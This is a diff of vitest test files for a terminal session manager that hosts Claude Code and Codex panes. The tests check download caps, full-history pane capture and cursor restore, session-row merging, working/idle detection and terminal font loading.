expect(res.headers['content-disposition']).toContain('filename="report.txt"');
expect(res.body).toBe('download content');
expect(res.headers['accept-ranges']).toBe('bytes');
expect(res.body).toBe('fake file bytes');
});
it('refuses a download past the configured cap', async () => {
mockedStat.mockResolvedValue({ size: 3 * 1024 * 1024 * 1024, isFile: () => true } as never); // 3GB > 2GB default
const res = await harness.app.inject({
method: 'GET',
url: `/api/download?sessionId=${harness.ctx._sessionId}&path=enormous.bin`,
});
expect(res.statusCode).toBe(413);
});
it('rejects absolute paths outside the session working directory', async () => {
+79
View File
@@ -851,6 +851,85 @@ describe('session-routes', () => {
);
});
it('full reload (?full=1) keeps every leading row so the restored cursor lands on the right line', async () => {
// The capture ends with an absolute cursor move, so its rows and the pane's
// rows must line up one for one. Three transforms used to run over it and
// each could delete a leading line: redraw-bloat stripping, the trim that
// cuts everything above the Claude banner, and a leading-whitespace strip.
// Any one of them shifted the frame up and left the caret a row off.
harness.ctx._session.mode = 'claude';
harness.ctx._session.terminalBuffer = '';
// A blank first row, then the banner — the shape a real pane has.
const rendered = ['', '\x1b[1mClaude Code v2.1.266', 'conversation', '\u276f ', '\x1b[4;3H'].join('\r\n');
(harness.ctx.mux as { captureActivePaneBuffer?: unknown }).captureActivePaneBuffer = vi.fn(
(_name: string, opts?: { fullHistory?: boolean }) => (opts?.fullHistory ? rendered : 'visible frame')
);
const res = await harness.app.inject({
method: 'GET',
url: `/api/sessions/${harness.ctx._sessionId}/terminal?full=1`,
});
expect(res.statusCode).toBe(200);
const body = JSON.parse(res.body);
expect(body.data.source).toBe('mux-full-history');
// The blank first row survives, so row N of the reply is row N of the pane.
expect(body.data.terminalBuffer.startsWith('\r\n')).toBe(true);
expect(body.data.terminalBuffer.split('\r\n')).toHaveLength(rendered.split('\r\n').length);
});
it('full reload (?full=1) still strips the byte history when no capture came back', async () => {
// The row-preserving skips exist for a rendered pane. When the capture is
// unavailable the reply IS the byte stream — successive Ink frames, no row
// alignment to protect — so keying the skips on the query parameter rather
// than on the capture returned it unstripped, which is the whole reason
// stripInkRedrawBloat exists. A session with no mux takes this path on
// every first selection, not just during an outage.
harness.ctx._session.mode = 'claude';
// A VPA cluster the stripper will collapse: >= 10 sequences, spanning the
// 32KB minimum, with real content after it.
const frame = '\x1b[12d' + 'spinner frame '.repeat(240);
harness.ctx._session.terminalBuffer = frame.repeat(20) + 'REAL CONTENT AFTER THE BLOAT';
(harness.ctx.mux as { captureActivePaneBuffer?: unknown }).captureActivePaneBuffer = vi.fn(() => null);
const res = await harness.app.inject({
method: 'GET',
url: `/api/sessions/${harness.ctx._sessionId}/terminal?full=1`,
});
expect(res.statusCode).toBe(200);
const body = JSON.parse(res.body);
expect(body.data.source).toBe('history');
expect(body.data.terminalBuffer).toContain('REAL CONTENT AFTER THE BLOAT');
// Stripped, not passed through whole.
expect(body.data.terminalBuffer.length).toBeLessThan(harness.ctx._session.terminalBuffer.length);
});
it('full reload (?full=1) keeps the byte history when the capture is empty', async () => {
// Pins the contract the capture side relies on: an empty capture means
// "nothing to replay" and the byte history survives. capturePaneBuffer
// returns '' for an all-blank pane precisely to reach this branch, since
// retaining trailing blank rows and appending a cursor move would
// otherwise make a blank screen non-empty and replace the history with it.
// (The blank-pane decision itself is unit-tested on hasVisibleContent —
// capturePaneBuffer short-circuits under IS_TEST_MODE and cannot run here.)
harness.ctx._session.mode = 'claude';
harness.ctx._session.terminalBuffer = 'a real conversation worth keeping';
(harness.ctx.mux as { captureActivePaneBuffer?: unknown }).captureActivePaneBuffer = vi.fn(
(_name: string, opts?: { fullHistory?: boolean }) => (opts?.fullHistory ? '' : 'visible frame')
);
const res = await harness.app.inject({
method: 'GET',
url: `/api/sessions/${harness.ctx._sessionId}/terminal?full=1`,
});
expect(res.statusCode).toBe(200);
const body = JSON.parse(res.body);
expect(body.data.source).toBe('history');
expect(body.data.terminalBuffer).toContain('a real conversation worth keeping');
});
it('full reload (?full=1) falls back to the byte history when the capture is unavailable', async () => {
harness.ctx._session.mode = 'claude';
harness.ctx._session.terminalBuffer = 'byte history survives';
@@ -14,6 +14,94 @@ import {
} from '../../src/services/unified-session-service.js';
describe('mergeUnifiedSessions', () => {
// A codex conversation showing twice is worse than cosmetic: the stale PAST row
// still resumes, so clicking it starts a SECOND `codex resume` on a thread
// already open in another pane. Both folds below are what prevent that.
it('folds a RESUMED codex session into its own rollout row', () => {
// Session sets claudeSessionId from codexConfig.resumeSessionId, so the live
// row already names the thread the rollout is keyed by.
const merged = mergeUnifiedSessions({
live: [{ id: 'codeman-uuid', status: 'idle', mode: 'codex', claudeSessionId: 'codex-thread-id' }],
history: [
{
sessionId: 'codex-thread-id',
workingDir: '/w',
sizeBytes: 4000,
lastModified: '2026-09-02T00:00:00.000Z',
mode: 'codex',
resumeId: 'codex-thread-id',
},
],
});
expect(merged).toHaveLength(1);
expect(merged[0].sessionId).toBe('codeman-uuid');
expect([...merged[0].sources].sort()).toEqual(['history', 'live']);
});
it('folds a FRESH codex session once its rollout has been matched by originator', () => {
// A fresh pane knows no thread id, so gatherUnifiedInputs() stamps one onto
// the live row from session_meta.originator (see codexThreadBySessionId).
// This is that stamped row.
const merged = mergeUnifiedSessions({
live: [{ id: 'codeman-uuid', status: 'busy', mode: 'codex', claudeSessionId: 'fresh-thread-id' }],
persisted: [{ id: 'codeman-uuid', status: 'idle', mode: 'codex', claudeSessionId: 'fresh-thread-id' }],
history: [
{
sessionId: 'fresh-thread-id',
workingDir: '/w',
sizeBytes: 900,
lastModified: '2026-09-02T00:00:00.000Z',
mode: 'codex',
resumeId: 'fresh-thread-id',
},
],
});
expect(merged).toHaveLength(1);
expect(merged[0].sessionId).toBe('codeman-uuid');
expect(merged[0].status).toBe('busy');
});
it('leaves an unrelated codex rollout as its own row', () => {
const merged = mergeUnifiedSessions({
live: [{ id: 'codeman-uuid', status: 'idle', mode: 'codex', claudeSessionId: 'thread-one' }],
history: [
{
sessionId: 'thread-two',
workingDir: '/w',
sizeBytes: 4000,
lastModified: '2026-09-02T00:00:00.000Z',
mode: 'codex',
resumeId: 'thread-two',
},
],
});
expect(merged.map((m) => m.sessionId).sort()).toEqual(['codeman-uuid', 'thread-two']);
});
it("carries a transcript row's own resume token, and stamps none on a live row", () => {
// codex names a thread by an id in its rollout, not by Codeman's session id.
// The scanner sets `resumeId`; a live session never does, which is what stops
// a resume from asking codex for a thread whose id is really Codeman's uuid.
const merged = mergeUnifiedSessions({
live: [{ id: 'codeman-uuid', status: 'idle', mode: 'codex' }],
history: [
{
sessionId: 'codex-thread-id',
workingDir: '/w',
sizeBytes: 4000,
lastModified: '2026-09-02T00:00:00.000Z',
mode: 'codex',
resumeId: 'codex-thread-id',
},
],
});
const fromTranscript = merged.find((m) => m.sessionId === 'codex-thread-id');
const fromLive = merged.find((m) => m.sessionId === 'codeman-uuid');
expect(fromTranscript?.resumeId).toBe('codex-thread-id');
expect(fromTranscript?.mode).toBe('codex');
expect(fromLive?.resumeId).toBeUndefined();
});
it('dedupes the same sessionId across live + persisted into one item', () => {
const merged = mergeUnifiedSessions({
live: [{ id: 's1', status: 'working', isWorking: true }],
+83 -8
View File
@@ -1,5 +1,5 @@
/**
* Working/idle detection for an interactive Claude pane.
* Working/idle detection for an interactive agent pane, Claude's and Codex's.
*
* The bug this pins: Claude redraws the composer (`❯`) about once a second all
* the way through a turn, so the old "saw a ❯, wait 2s, call it idle" rule
@@ -7,11 +7,17 @@
* worker: `GET /api/sessions` reported `idle` for a session that had been
* running for 17 minutes and was mid-tool-call.
*
* A second bug this pins: work detection read Claude's glyph and Claude's status line
* for every CLI, so a Codex session reported itself idle through an entire turn. Each CLI
* now names its own pair in `capabilities.workDetect`, and a CLI that names none reports
* work exactly as before.
*
* The status-line fixtures below are verbatim captures from live panes
* (`tmux -L codeman capture-pane -p`) on Claude Code 2.1.220.
* (`tmux -L codeman capture-pane -p`) on Claude Code 2.1.220 and Codex CLI 0.152.1.
*/
import { describe, expect, it, vi, afterEach } from 'vitest';
import { Session } from '../src/session.js';
import { getCli } from '../src/config/cli-registry/index.js';
import { CLAUDE_WORKING_LINE_PATTERN } from '../src/utils/regex-patterns.js';
import {
trackActivityStreak,
@@ -38,7 +44,7 @@ function feed(session: Session, data: string): void {
* A session whose mux reports a fixed (or scripted) screen, so the pane probe has
* something to read. Only `capturePaneText` is exercised by these paths.
*/
function withFakePane(screen: string | (() => string)): Session {
function withFakePane(screen: string | (() => string), mode: 'claude' | 'codex' = 'claude'): Session {
const read = typeof screen === 'function' ? screen : () => screen;
const mux = {
isAvailable: () => true,
@@ -46,12 +52,26 @@ function withFakePane(screen: string | (() => string)): Session {
} as unknown as NonNullable<Parameters<typeof Session.prototype.constructor>[0]>['mux'];
return new Session({
workingDir: '/tmp',
mode: 'claude',
mode,
mux,
muxSession: { muxName: 'codeman-test', sessionId: 'test', createdAt: Date.now() },
} as ConstructorParameters<typeof Session>[0]);
}
/**
* Codex's pane, verbatim, while a turn runs and once it has finished. Codex draws `›` on
* its composer row through the whole turn, exactly as Claude draws `❯`, and prints
* `esc to interrupt` only while the turn is live.
*/
const CODEX_WORKING =
'Working (2m 49s • esc to interrupt)\n› Ask Codex to do anything\n' +
' gpt-5.6-sol high · Context 59% left · ~/innovi/irisplus-ent-2 · main\n';
const CODEX_FINISHED =
'─ Worked for 3m 47s ────────────────────\n› Ask Codex to do anything\n' +
' gpt-5.6-sol high · Context 57% left · ~/innovi/irisplus-ent-2 · main\n';
/** Codex's own composer repaint, the frame that arms the idle confirmation. */
const CODEX_COMPOSER_REPAINT = '\x1b[31;1H\x1b[38;5;246m›\xa0\x1b[39m\x1b[0m';
/** A composer repaint: the frame Claude ships roughly once a second while working. */
const COMPOSER_REPAINT =
'\x1b[31;1H\x1b[38;5;246m❯\xa0\x1b[39m\x1b[0m\x1b[33;1H \x1b[38;5;246mOpus 5 in:143,699 out:669 ctx:14%\x1b[39m';
@@ -230,11 +250,13 @@ describe('Session interactive idle detection', () => {
expect(session.status).toBe('idle');
});
it('does not mark an external CLI pane working off raw activity', () => {
it('does not mark an uncharacterised CLI working off raw activity', () => {
vi.useFakeTimers();
// Codex/Gemini/OpenCode render their own TUIs and have no ❯, so nothing would
// arm the idle confirmation, so a session marked working here would never recover.
const session = new Session({ workingDir: '/tmp', mode: 'codex' });
// Gemini and OpenCode render their own TUIs, and Codeman knows neither one's glyph,
// so nothing would arm the idle confirmation and a session marked working here would
// never recover. A CLI that names no glyph therefore reports no work at all.
expect(getCli('gemini')?.capabilities.workDetect).toBeUndefined();
const session = new Session({ workingDir: '/tmp', mode: 'gemini' });
const events: string[] = [];
session.on('working', () => events.push('working'));
@@ -245,6 +267,59 @@ describe('Session interactive idle detection', () => {
expect(events).toEqual([]);
});
it('marks a Codex pane working, and lets the turn end', () => {
vi.useFakeTimers();
let screen = CODEX_WORKING;
const session = withFakePane(() => screen, 'codex');
const events: string[] = [];
session.on('working', () => events.push('working'));
session.on('idle', () => events.push('idle'));
for (let i = 0; i < 3; i++) {
feed(session, CODEX_COMPOSER_REPAINT);
vi.advanceTimersByTime(1000);
}
vi.advanceTimersByTime(20_000);
// The old code reported this session idle for the whole turn.
expect(events).toEqual(['working']);
expect(session.status).toBe('busy');
// Turn over: the working footer gives way to the finished line, which must NOT
// read as work — it sits on screen for the whole idle period afterwards.
screen = CODEX_FINISHED;
vi.advanceTimersByTime(20_000);
expect(events).toEqual(['working', 'idle']);
expect(session.status).toBe('idle');
});
});
describe("codex's work-detection descriptor", () => {
const codex = getCli('codex')?.capabilities.workDetect;
it('matches the footer Codex prints while a turn runs', () => {
expect(new RegExp(codex!.workingLine).test(CODEX_WORKING)).toBe(true);
});
it('does not match the finished line, nor the idle footer', () => {
expect(new RegExp(codex!.workingLine).test(CODEX_FINISHED)).toBe(false);
});
it('matches the footer case-insensitively on the E', () => {
// Characterised on codex-cli 0.152.1, which prints a lowercase `esc`. A future
// version capitalising it would otherwise make the whole fix silently inert:
// the pane would simply never look like it was working.
expect(new RegExp(codex!.workingLine).test(CODEX_WORKING.replace('esc to interrupt', 'Esc to interrupt'))).toBe(
true
);
});
it('names the glyph Codex actually draws on its composer row', () => {
expect(CODEX_COMPOSER_REPAINT).toContain(codex!.promptGlyph);
expect(CODEX_WORKING).toContain(codex!.promptGlyph);
});
});
describe('wire activity stamp across recovery', () => {
@@ -100,9 +100,11 @@ describe('Session claude conversation chain', () => {
// before this existed. Every assignment built from the launch-id fallback
// must therefore carry `restoredConversation` first.
const source = readFileSync(resolve(import.meta.dirname, '../src/session.ts'), 'utf8');
const fallbackAssignments = source.match(
/_claudeSessionId =\s*\n?\s*[^;]*?_resumeSessionId \|\| this\._ompConfig\?\.resumeSessionId \|\| this\.id;/g
);
// The tail of the chain grows as each CLI gains a resume alias of its own
// (omp, then codex), so the pattern pins the two ends and lets the middle
// widen. A `[^;]` run cannot cross a statement boundary, so each match is
// still one assignment.
const fallbackAssignments = source.match(/_claudeSessionId =[^;]*?_resumeSessionId[^;]*?this\.id;/g);
expect(fallbackAssignments).not.toBeNull();
expect(fallbackAssignments!.length).toBeGreaterThanOrEqual(2);
for (const assignment of fallbackAssignments!) {
+210
View File
@@ -0,0 +1,210 @@
/**
* @fileoverview A terminal is measured only once its own font can be measured.
*
* The first fit runs while the browser is still painting with a fallback font,
* whose character cell is a different size from the terminal font's. The grid
* that fit produces is therefore wrong, the pane is sized to it, and the
* correction arrives after the session's buffer has been replayed — so the CLI
* repaints for a shape that does not match what is on screen.
*
* Two properties carry the fix and both are pinned here:
*
* - The wait REQUESTS each measurable face and then forces xterm to re-measure.
* Waiting alone buys nothing: `FitAddon.proposeDimensions()` divides by a
* cached cell size that xterm refreshes only from `open()`, from a resize
* that changed the grid, and on a device-pixel-ratio change. Nothing in it
* listens for font loading, so a fit after the font arrives can still divide
* by the fallback cell and short-circuit.
* - The wait is BOUNDED. `FontFaceSet.ready` has no deadline, and `selectSession`
* awaits this before painting, so an unbounded wait would strand the session
* instead of merely mis-measuring it.
*
* Loaded via `vm` with a stubbed context (no jsdom — jsdom is broken on this
* box; see connection-indicator.test.ts), the same way terminal-buffer-flush
* extracts the real mixin methods from terminal-ui.js.
*/
import { readFileSync } from 'node:fs';
import { performance } from 'node:perf_hooks';
import { resolve } from 'node:path';
import vm from 'node:vm';
import { afterEach, beforeEach, describe, expect, it, vi } from 'vitest';
/** The mixin runs inside the vm context, so its `document` must live there. */
let currentDocument: unknown;
function loadTerminalMixin(): Record<string, unknown> {
const dir = resolve(import.meta.dirname, '../src/web/public');
const FakeCodemanApp = function () {} as unknown as { prototype: Record<string, unknown> };
const context = vm.createContext({
console,
performance,
setTimeout,
clearTimeout,
setInterval: vi.fn(),
clearInterval: vi.fn(),
requestAnimationFrame: vi.fn(),
CodemanApp: FakeCodemanApp,
window: { addEventListener: vi.fn(), removeEventListener: vi.fn() },
get document() {
return currentDocument;
},
});
// constants.js supplies TERMINAL_FONT_WAIT_MS and TERMINAL_FONT_UNMEASURED.
const constants = readFileSync(resolve(dir, 'constants.js'), 'utf8');
const source = readFileSync(resolve(dir, 'terminal-ui.js'), 'utf8');
vm.runInContext(`${constants}\n${source}`, context);
return FakeCodemanApp.prototype;
}
const mixin = loadTerminalMixin();
type FontApp = {
_awaitTerminalFont: () => Promise<void>;
terminal: unknown;
};
function makeApp(fontFamily: string, opts: { measure?: () => void } = {}) {
const measure = vi.fn(opts.measure);
const app = {
_awaitTerminalFont: mixin._awaitTerminalFont,
terminal: {
options: { fontFamily, fontSize: 14 },
_core: { _charSizeService: { measure } },
},
} as unknown as FontApp & { terminal: { _core: { _charSizeService: { measure: typeof measure } } } };
return { app, measure };
}
/** A FontFaceSet stub recording what was asked for. */
function fontsStub(overrides: { load?: unknown; ready?: Promise<unknown> } = {}) {
const requested: string[] = [];
return {
requested,
fonts: {
load: overrides.load ?? ((spec: string) => (requested.push(spec), Promise.resolve([]))),
ready: overrides.ready ?? Promise.resolve(),
status: 'loaded',
},
};
}
beforeEach(() => {
vi.useRealTimers();
});
afterEach(() => {
currentDocument = undefined;
vi.useRealTimers();
});
describe('terminal font settle', () => {
it('requests every measurable family in the stack, unquoted', async () => {
const stub = fontsStub();
currentDocument = stub;
const { app } = makeApp('"Fira Code", "JetBrains Mono", monospace');
await app._awaitTerminalFont();
expect(stub.requested).toEqual(['14px "Fira Code"', '14px "JetBrains Mono"']);
});
it('does not wait on faces that cannot move the measured cell', async () => {
// The symbols face is ~1.2MB of private-use-area glyphs and xterm measures
// `W`, so awaiting it puts a megabyte in front of the first frame for
// nothing. The generics match no FontFace at all.
const stub = fontsStub();
currentDocument = stub;
const { app } = makeApp('"JetBrains Mono", "Symbols Nerd Font Mono", monospace, serif, system-ui');
await app._awaitTerminalFont();
expect(stub.requested).toEqual(['14px "JetBrains Mono"']);
});
it('forces xterm to re-measure, because loading a font does not', async () => {
// The property the whole change rests on. Without this the fit that follows
// still divides the container by the fallback cell.
currentDocument = fontsStub();
const { app, measure } = makeApp('"JetBrains Mono"');
await app._awaitTerminalFont();
expect(measure).toHaveBeenCalledTimes(1);
});
it('gives up on a font that never arrives, and still re-measures', async () => {
// FontFaceSet.ready has no deadline of its own, and selectSession awaits
// this before painting: unbounded here means a session that never renders.
currentDocument = fontsStub({ ready: new Promise(() => {}) });
const { app, measure } = makeApp('"JetBrains Mono"');
const started = Date.now();
await app._awaitTerminalFont();
expect(measure).toHaveBeenCalledTimes(1);
// Bounded by TERMINAL_FONT_WAIT_MS (2s), not left pending.
expect(Date.now() - started).toBeLessThan(4000);
}, 10_000);
it('survives a rejecting load and a browser with no font API', async () => {
currentDocument = fontsStub({ load: () => Promise.reject(new Error('network')) });
const { app: rejecting, measure: m1 } = makeApp('"JetBrains Mono"');
await expect(rejecting._awaitTerminalFont()).resolves.toBeUndefined();
expect(m1).toHaveBeenCalledTimes(1);
currentDocument = {};
const { app: noApi, measure: m2 } = makeApp('"JetBrains Mono"');
await expect(noApi._awaitTerminalFont()).resolves.toBeUndefined();
// No font API means nothing to wait for and nothing to re-measure against.
expect(m2).not.toHaveBeenCalled();
});
it('does not throw when the terminal was disposed mid-wait', async () => {
currentDocument = fontsStub();
const app = { _awaitTerminalFont: mixin._awaitTerminalFont, terminal: null } as unknown as FontApp;
await expect(app._awaitTerminalFont()).resolves.toBeUndefined();
});
});
describe('selectSession font gate', () => {
const appSource = readFileSync(resolve(import.meta.dirname, '../src/web/public/app.js'), 'utf8');
const selectStart = appSource.indexOf('async selectSession(sessionId, options = {})');
const body = appSource.slice(
selectStart,
appSource.indexOf('\n // Shared cleanup for all session data', selectStart)
);
it('waits for the font before the first fit', () => {
const wait = body.indexOf('await this._terminalFontReady');
const fit = body.indexOf('if (this.fitAddon) this.fitAddon.fit();');
expect(wait).toBeGreaterThan(-1);
expect(fit).toBeGreaterThan(-1);
expect(wait).toBeLessThan(fit);
});
it('waits BEFORE opening the buffer-load gate', () => {
// Inside the gate every live SSE event queues instead of painting, so a slow
// font would hold output back rather than only mis-measuring the grid.
const wait = body.indexOf('await this._terminalFontReady');
const gate = body.indexOf('this._beginBufferLoad(selectGen)');
expect(gate).toBeGreaterThan(-1);
expect(wait).toBeLessThan(gate);
});
it('keeps the synchronous focus ahead of the wait (iOS Safari)', () => {
// iOS honours programmatic focus only inside the user-gesture call stack,
// which the first await ends.
const focus = body.indexOf('if (shouldFocusTerminal && this.terminal) this.terminal.focus();');
const wait = body.indexOf('await this._terminalFontReady');
expect(focus).toBeGreaterThan(-1);
expect(focus).toBeLessThan(wait);
});
it('re-checks for a newer selection after the wait', () => {
const wait = body.indexOf('await this._terminalFontReady');
const guard = body.indexOf('this._isStaleSelect(selectGen)', wait);
expect(guard).toBeGreaterThan(-1);
expect(guard - wait).toBeLessThan(200);
});
});
+68 -6
View File
@@ -11,11 +11,15 @@
import { readFileSync } from 'node:fs';
import { resolve } from 'node:path';
import { describe, expect, it } from 'vitest';
import { formatCursorRestore, hasVisibleContent } from '../src/tmux-manager.js';
describe('tmux full-history pane capture (COD-47)', () => {
const source = readFileSync(resolve(import.meta.dirname, '../src/tmux-manager.ts'), 'utf8');
const methodStart = source.indexOf('capturePaneBuffer(muxName: string');
const methodBody = source.slice(methodStart, methodStart + 4000);
// Bounded at the next method so `methodBody` really is one method: the
// ordering assertions below would otherwise be satisfiable by a neighbour.
const methodEnd = source.indexOf('captureActivePaneBuffer(muxName: string', methodStart);
const methodBody = source.slice(methodStart, methodEnd);
it('capturePaneBuffer accepts pane-capture options with a fullHistory flag', () => {
expect(methodStart).toBeGreaterThan(-1);
@@ -42,13 +46,37 @@ describe('tmux full-history pane capture (COD-47)', () => {
});
it('returns full-history capture as raw scrollback (skips the single-screen repaint)', () => {
// When fullHistory, return the raw buffer BEFORE the formatPaneSnapshot
// repaint (which is single-screen and would clip a multi-screen history).
const earlyReturn = methodBody.indexOf('return normalizeScrollbackEol(buffer);');
// The fullHistory branch returns before the formatPaneSnapshot repaint,
// which is single-screen and would clip a multi-screen history.
const branch = methodBody.indexOf('if (fullHistory) {\n // Without geometry');
const snapshot = methodBody.indexOf('formatPaneSnapshot(');
expect(earlyReturn).toBeGreaterThan(-1);
expect(branch).toBeGreaterThan(-1);
expect(snapshot).toBeGreaterThan(-1);
expect(earlyReturn).toBeLessThan(snapshot);
expect(branch).toBeLessThan(snapshot);
// …and what it returns is normalized linear scrollback, not a repaint.
expect(methodBody.slice(branch, snapshot)).toContain('normalizeScrollbackEol(');
});
it('appends the pane cursor to the full-history capture', () => {
// A linear replay leaves the caret wherever the last character landed — the
// status line, for an agent CLI — and every cursor-relative update the CLI
// sends afterwards is then measured from the wrong row.
const restore = methodBody.indexOf('formatCursorRestore(geometry)');
const snapshot = methodBody.indexOf('formatPaneSnapshot(');
expect(restore).toBeGreaterThan(-1);
expect(restore).toBeLessThan(snapshot);
});
it('keeps the trailing rows only when a cursor move will follow', () => {
// Trailing blank rows are the bottom of the screen and the cursor move counts
// up from them, so the two decisions travel together: no geometry, no move,
// and the old trim applies instead.
expect(methodBody).toContain("rawCapture.replace(/\\n$/, '')");
expect(methodBody).toContain("if (!geometry) return normalizeScrollbackEol(rawCapture.replace(/\\n+$/g, ''))");
});
it('defers to the byte history when the pane holds nothing visible', () => {
expect(methodBody).toContain("if (!hasVisibleContent(trimmed)) return ''");
});
it('captureActivePaneBuffer forwards the capture options', () => {
@@ -59,3 +87,37 @@ describe('tmux full-history pane capture (COD-47)', () => {
expect(body).toContain('this.capturePaneBuffer(muxName, target, opts)');
});
});
describe('full-history cursor restore', () => {
it('counts up from the last replayed row rather than down from the top', () => {
// Relative, not `CUP`: absolute row addressing is only correct while the
// browser's row count equals the pane's, and resizeWindow does not wait for
// tmux, so a capture can be taken before a requested resize has applied.
expect(formatCursorRestore({ cols: 80, rows: 24, cursorX: 2, cursorY: 20 })).toBe('\x1b[3A\r\x1b[2C');
});
it('emits no row move when the caret is already on the last row', () => {
expect(formatCursorRestore({ cols: 80, rows: 24, cursorX: 5, cursorY: 23 })).toBe('\r\x1b[5C');
});
it('emits no column move for column zero', () => {
expect(formatCursorRestore({ cols: 80, rows: 10, cursorX: 0, cursorY: 0 })).toBe('\x1b[9A\r');
});
});
describe('hasVisibleContent', () => {
it('is false for a pane of blank rows', () => {
expect(hasVisibleContent('\n'.repeat(23))).toBe(false);
});
it('is false for blank rows carrying only SGR attributes', () => {
// `capture-pane -e` styles every row, so an all-blank pane is not an empty
// string. Treating it as content would replace the byte history with a
// blank screen.
expect(hasVisibleContent('\x1b[m \x1b[0m\n\x1b[m \x1b[0m')).toBe(false);
});
it('is true as soon as one row carries a character', () => {
expect(hasVisibleContent('\x1b[m \x1b[0m\n\x1b[m x \x1b[0m')).toBe(true);
});
});